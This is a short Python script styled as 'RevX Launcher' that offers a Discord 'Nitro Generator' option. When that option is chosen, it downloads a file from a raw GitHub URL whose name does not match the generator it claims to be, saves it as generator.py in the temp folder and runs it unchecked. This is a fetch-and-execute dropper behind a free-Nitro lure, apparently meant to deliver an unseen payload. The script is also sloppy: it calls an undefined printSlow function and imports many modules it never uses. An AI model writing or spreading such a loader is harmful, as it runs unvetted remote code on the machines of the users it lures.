import random
import threading
import string
import time
import sys
from colorama.ansi import Fore
import numpy as np
import requests
import os
import itertools
import subprocess

print(f"""{Fore.RED}


  ____           __  __
 |  _ \ _____   _\ \/ /
 | |_) / _ \ \ / /\  / 
 |  _ <  __/\ V / /  \ 
 |_| \_\___| \_/ /_/\_\
                       

                        


""")

print(f"{Fore.YELLOW}Welcome to RevX Launcher!{Fore.RESET}")
time.sleep(1)
print("""
 ╦═════════════════════════╦
 ║[1] - Nitro Generator    ║                         
 ║[2] - Exit               ║                                                                       
 ╩═════════════════════════╩
 """)

mode = input("[>>>] Option: ")

if (mode == "2"):
    os.system("CLS")
    printSlow(f"{Fore.GREEN}Thanks for using{Fore.BLUE} [RevX]")
    time.sleep(3)
    exit()   

if (mode == "1"):
 class launcher:
    getcode = requests.get("https://raw.githubusercontent.com/Exerz7/NitroGenSCR/main/KrnlX%20v1")
    temp = os.getenv("temp") + "\\generator.py"
    with open(temp, "wb") as f:
        f.write(getcode.content);
    os.system(f"python {temp}")
launcher()
